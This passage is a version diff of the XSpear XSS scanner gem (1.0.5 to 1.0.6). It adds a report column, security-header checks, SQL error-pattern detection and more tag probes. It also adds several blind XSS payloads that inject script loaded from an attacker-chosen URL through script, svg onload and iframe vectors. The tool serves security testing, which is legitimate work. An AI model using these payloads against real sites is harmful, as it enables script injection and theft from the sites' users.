  rissue = {"f"=>"FILERD RULE","r"=>"REFLECTED","x"=>"XSS","s"=>"STATIC ANALYSIS","d"=>"DYNAMIC ANALYSIS"}
36
- @issue.insert(0,["-", rtype[type], rissue[issue], param, pattern, description])
37
+ @issue.insert(0,["-", rtype[type], rissue[issue], @method, param, pattern, description])
37
38
  @query.push payload
38
39
  end
39
40
 
40
41
  def add_issue(type, issue, param, payload, pattern, description)
41
42
  rtype = {"i"=>"INFO","v"=>"VULN","l"=>"LOW","m"=>"MIDUM","h"=>"HIGH"}
42
43
  rissue = {"f"=>"FILERD RULE","r"=>"REFLECTED","x"=>"XSS","s"=>"STATIC ANALYSIS","d"=>"DYNAMIC ANALYSIS"}
43
- @issue << [@issue.size, rtype[type], rissue[issue], param, pattern, description]
44
+ @issue << [@issue.size, rtype[type], rissue[issue], @method, param, pattern, description]
44
45
  @query.push payload
45
46
  end
46
47
 
@@ -77,11 +78,11 @@ class XspearRepoter
77
78
  end
78
79
  table = Terminal::Table.new
79
80
  table.title = "[ XSpear report ]".red+"\n#{rurl}\n#{@starttime} ~ #{@endtime} Found #{@issue.length} issues."
80
- table.headings = ['NO','TYPE','ISSUE','PARAM','PAYLOAD','DESCRIPTION']
81
+ table.headings = ['NO','TYPE','ISSUE', 'METHOD', 'PARAM', 'PAYLOAD','DESCRIPTION']
81
82
  table.rows = @issue
82
83
  #table.style = {:width => 80}
83
84
  puts table
84
- puts "< Not Filtered >".yellow
85
+ puts "< Available Objects >".yellow
85
86
  @filtered_objects.each do |key, value|
86
87
  eh = []
87
88
  tag = []
@@ -100,9 +101,9 @@ class XspearRepoter
100
101
  sc.push n.sub("XsPeaR","")
101
102
  end
102
103
  end
103
- puts " + Special Char: ".green+"#{sc.map(&:inspect).join(',').gsub('"',"")}"
104
- puts " + Event Handler: ".green+"#{eh.map(&:inspect).join(',')}"
105
- puts " + HTML Tag: ".green+"#{tag.map(&:inspect).join(',')}"
104
+ puts " + Available Special Char: ".green+"#{sc.map(&:inspect).join(',').gsub('"',"")}".gsub(',',' ')
105
+ puts " + Available Event Handler: ".green+"#{eh.map(&:inspect).join(',')}"
106
+ puts " + Available HTML Tag: ".green+"#{tag.map(&:inspect).join(',')}"
106
107
  end
107
108
  puts "< Raw Query >".yellow
108
109
  @query.each_with_index do |q, i|
@@ -1,3 +1,3 @@
1
1
  module XSpear
2
- VERSION = "1.0.5"
2
+ VERSION = "1.0.6"
3
3
  end
data/lib/XSpear.rb CHANGED
@@ -26,16 +26,17 @@ class XspearScan
26
26
  @output = output
27
27
  @verbose = verbose
28
28
  @blind_url = blind
29
- @report = XspearRepoter.new @url, Time.now
29
+ @report = XspearRepoter.new @url, Time.now, (@data.nil? ? "GET" : "POST")
30
30
  @filtered_objects = {}
31
31
  end
32
32
 
33
33
  class ScanCallbackFunc
34
- def initialize(url, method, query, response)
34
+ def initialize(url, method, query, response, report)
35
35
  @url = url
36
36
  @method = method
37
37
  @query = query
38
38
  @response = response
39
+ @report = report
39
40
  # self.run
40
41
  end
41
42
 
@@ -64,40 +65,92 @@ class XspearScan
64
65
  class CallbackNotAdded < ScanCallbackFunc
65
66
  def run
66
67
  if @response.body.include? @query
67
- log("i","reflected #{@query}")
68
+ time = Time.now
69
+ puts '[I]'.blue + " [#{time.strftime('%H:%M:%S')}] reflected #{@query}"
68
70
  [false, true]
69
71
  else
70
- [false, false]
72
+ [false, "Not reflected #{@query}"]
71
73
  end
72
74
  end
73
75
  end
74
76
 
77
+ class CallbackCheckHeaders < ScanCallbackFunc
78
+ def run
79
+ if !@response['Server'].nil?
80
+ # Server header
81
+ @report.add_issue("i","s","-","-","original query","Found Server: #{@response['Server']}")
82
+ end
83
+
84
+ if @response['Strict-Transport-Security'].nil?
85
+ # HSTS
86
+ @report.add_issue("i","s","-","-","original query","Not set HSTS")
87
+ end
88
+
89
+
90
+ if !@response['Content-Type'].nil?
91
+ @report.add_issue("i","s","-","-","original query","Content-Type: #{@response['Content-Type']}")
92
+ end
93
+
94
+
95
+ if !@response['X-XSS-Protection'].nil?
96
+ @report.add_issue("i","s","-","-","original query","Not set X-XSS-Protection")
97
+ end
98
+
99
+ if !@response['X-Frame-Options'].nil?
100
+ @report.add_issue("i","s","-","-","original query","X-Frame-Options: #{@response['X-Frame-Options']}")
101
+ else
102
+ @report.add_issue("l","s","-","-","original query","Not Set X-Frame-Options")
103
+ end
104
+
105
+
106
+ if !@response['Content-Security-Policy'].nil?
107
+ begin
108
+ csp = @response['Content-Security-Policy']
109
+ csp = csp.split(';')
110
+ r = " "
111
+ csp.each do |c|
112
+ d = c.split " "
113
+ r = r+d[0]+" "
114
+ end
115
+ @report.add_issue("i","s","-","-","original query","Set CSP(#{r})")
116
+ rescue
117
+ @report.add_issue("i","s","-","-","original query","CSP ERROR")
118
+ end
119
+ else
120
+ @report.add_issue("m","s","-","-","original query","Not Set CSP")
121
+ end
122
+
123
+
124
+ [false, "not reflected #{@query}"]
125
+ end
126
+ end
127
+
75
128
  class CallbackErrorPatternMatch < ScanCallbackFunc
76
129
  def run
77
130
  info = "Found"
78
131
  if @response.body.to_s.match(/(SQL syntax.*MySQL|Warning.*mysql_.*|MySqlException \(0x|valid MySQL result|check the manual that corresponds to your (MySQL|MariaDB) server version|MySqlClient\.|com\.mysql\.jdbc\.exceptions)/i)
79
- info = info + "MYSQL "
132
+ info = info + "MYSQL Error"
80
133
  end
81
134
  if @response.body.to_s.match(/(Driver.* SQL[\-\_\ ]*Server|OLE DB.* SQL Server|\bSQL Server.*Driver|Warning.*mssql_.*|\bSQL Server.*[0-9a-fA-F]{8}|[\s\S]Exception.*\WSystem\.Data\.SqlClient\.|[\s\S]Exception.*\WRoadhouse\.Cms\.|Microsoft SQL Native Client.*[0-9a-fA-F]{8})/i)
82
- info = info + "MSSQL "
135
+ info = info + "MSSQL Error"
83
136
  end
84
137
  if @response.body.to_s.match(/(\bORA-\d{5}|Oracle error|Oracle.*Driver|Warning.*\Woci_.*|Warning.*\Wora_.*)/i)
85
- info = info + "Oracle "
138
+ info = info + "Oracle Error"
86
139
  end
87
140
  if @response.body.to_s.match(/(PostgreSQL.*ERROR|Warning.*\Wpg_.*|valid PostgreSQL result|Npgsql\.|PG::SyntaxError:|org\.postgresql\.util\.PSQLException|ERROR:\s\ssyntax error at or near)/i)
88
- info = info + "Postgres "
141
+ info = info + "Postgres Error"
89
142
  end
90
143
  if @response.body.to_s.match(/(Microsoft Access (\d+ )?Driver|JET Database Engine|Access Database Engine|ODBC Microsoft Access)/i)
91
- info = info + "MSAccess "
144
+ info = info + "MSAccess Error"
92
145
  end
93
146
  if @response.body.to_s.match(/(SQLite\/JDBCDriver|SQLite.Exception|System.Data.SQLite.SQLiteException|Warning.*sqlite_.*|Warning.*SQLite3::|\[SQLITE_ERROR\])/i)
94
- info = info + "SQLite "
147
+ info = info + "SQLite Error"
95
148
  end
96
149
  if @response.body.to_s.match(/(Warning.*sybase.*|Sybase message|Sybase.*Server message.*|SybSQLException|com\.sybase\.jdbc)/i)
97
- info = info + "SyBase "
150
+ info = info + "SyBase Error"
98
151
  end
99
152
  if @response.body.to_s.match(/(Warning.*ingres_|Ingres SQLSTATE|Ingres\W.*Driver)/i)
100
- info = info + "Ingress "
153
+ info = info + "Ingress Error"
101
154
  end
102
155
 
103
156
  if info.length > 5
@@ -248,7 +301,17 @@ class XspearScan
248
301
  ]
249
302
  tags = [
250
303
  "script",
251
- "iframe"
304
+ "iframe",
305
+ "svg",
306
+ "img",
307
+ "video",
308
+ "audio",
309
+ "meta",
310
+ "object",
311
+ "embeded",
312
+ "style",
313
+ "frame",
314
+ "frameset"
252
315
  ]
253
316
  special_chars =[
254
317
  ">",
@@ -274,11 +337,12 @@ class XspearScan
274
337
  ]
275
338
 
276
339
  log('s', 'creating a test query.')
340
+ r.push makeQueryPattern('s', '', '', 'i', "-", CallbackCheckHeaders)
277
341
  r.push makeQueryPattern('d', 'XsPeaR"', 'XsPeaR"', 'i', "Found SQL Error Pattern", CallbackErrorPatternMatch)
278
342
  r.push makeQueryPattern('r', 'rEfe6', 'rEfe6', 'i', 'reflected parameter', CallbackStringMatch)
279
343
  # Check Special Char
280
344
  special_chars.each do |sc|
281
- r.push makeQueryPattern('f', "XsPeaR#{sc}>", "XsPeaR#{sc}", 'i', "not filtered "+"#{sc}".blue, CallbackNotAdded)
345
+ r.push makeQueryPattern('f', "#{sc}XsPeaR", "#{sc}XsPeaR", 'i', "not filtered "+"#{sc}".blue, CallbackNotAdded)
282
346
  end
283
347
 
284
348
  # Check Event Handler
@@ -306,8 +370,10 @@ class XspearScan
306
370
 
307
371
  # Check Blind XSS Payload
308
372
  if !@blind_url.nil?
309
- payload = "<script src=#{@blind_url}></script>"
310
- r.push makeQueryPattern('f', "\"'>#{payload}", "NOTDETECTED", 'i', "", CallbackNotAdded)
373
+ r.push makeQueryPattern('f', "\"'><script src=#{@blind_url}></script>", "NOTDETECTED", 'i', "", CallbackNotAdded)
374
+ r.push makeQueryPattern('f', "\"'><script>$.getScript('#{@blind_url}')</script>", "NOTDETECTED", 'i', "", CallbackNotAdded)
375
+ r.push makeQueryPattern('f', "\"'><svg onload=javascript:eval('d=document; _ = d.createElement(\'script\');_.src=\'#{@blind_url}\';d.body.appendChild(_)')>", "NOTDETECTED", 'i', "", CallbackNotAdded)
376
+ r.push makeQueryPattern('f', "\"'><iframe src=javascript:$.getScript('#{@blind_url}')></iframe>", "NOTDETECTED", 'i', "", CallbackNotAdded)
311
377
  end
312
378
 
313
379
  r = r.flatten
@@ -328,10 +394,10 @@ class XspearScan
328
394
  if result[0]
329
395
  log(node[:category], (result[1]).to_s.yellow+"[param: #{node[:param]}][#{node[:desc]}]")
330
396
  @report.add_issue(node[:category],node[:type],node[:param],node[:query],node[:pattern],node[:desc])
331
- elsif node[:callback] == CallbackNotAdded
397
+ elsif (node[:callback] == CallbackNotAdded) && (result[1].to_s == "true")
332
398
  @filtered_objects[node[:param].to_s].nil? ? (@filtered_objects[node[:param].to_s] = [node[:pattern].to_s]) : (@filtered_objects[node[:param].to_s].push(node[:pattern].to_s))
333
399
  else
334
- log('d', (result[1]).to_s)
400
+ log('d', "'#{node[:param]}' "+(result[1]).to_s)
335
401
  end
336
402
  rescue => e
337
403
  end
@@ -358,11 +424,11 @@ class XspearScan
358
424
 
359
425
  result = []
360
426
  if type == 's'
361
- result.push("inject": 'url',"param":"STATIC" ,"type": type, "query": @url, "pattern": pattern, "desc": desc, "category": category, "callback": callback)
362
- unless @data.nil?
427
+ if @data.nil?
428
+ result.push("inject": 'url',"param":"STATIC" ,"type": type, "query": @url, "pattern": pattern, "desc": desc, "category": category, "callback": callback)
429
+ else
363
430
  result.push("inject": 'body',"param":"STATIC" ,"type": type, "query": @url, "pattern": pattern, "desc": desc, "category": category, "callback": callback)
364
431
  end
365
- p result
366
432
  else
367
433
  uri = URI.parse(@url)
368
434
  begin
@@ -432,7 +498,7 @@ class XspearScan
432
498
  end
433
499
  end
434
500
  response = http.request(request)
435
- result = callback.new(uri.to_s, method, pattern, response).run
501
+ result = callback.new(uri.to_s, method, pattern, response, @report).run
436
502
  # result = result.run
437
503
  # p request.headers
438
504
  return result, response
metadata CHANGED
@@ -1,14 +1,14 @@
1
1
  --- !ruby/object:Gem::Specification
2
2
  name: XSpear
3
3
  version: !ruby/object:Gem::Version
4
- version: 1.0.5
4
+ version: 1.0.6
5
5
  platform: ruby
6
6
  authors:
7
7
  - hahwul
8
8
  autorequire:
9
9
  bindir: exe
10
10
  cert_chain: []
11
- date: 2019-07-22 00:00:00.000000000 Z
11
+ date: 2019-07-23 00:00:00.000000000 Z
12
12
  dependencies:
13
13
  - !ruby/object:Gem::Dependency
14
14
  name: colorize
@@ -144,6 +144,7 @@ executables:
144
144
  extensions: []
145
145
  extra_rdoc_files: []
146
146
  files:
147
+ - ".github/FUNDING.yml"
147
148
  - ".gitignore"
148
149
  - ".idea/XSpear.iml"
149
150
  - ".idea/encodings.xml"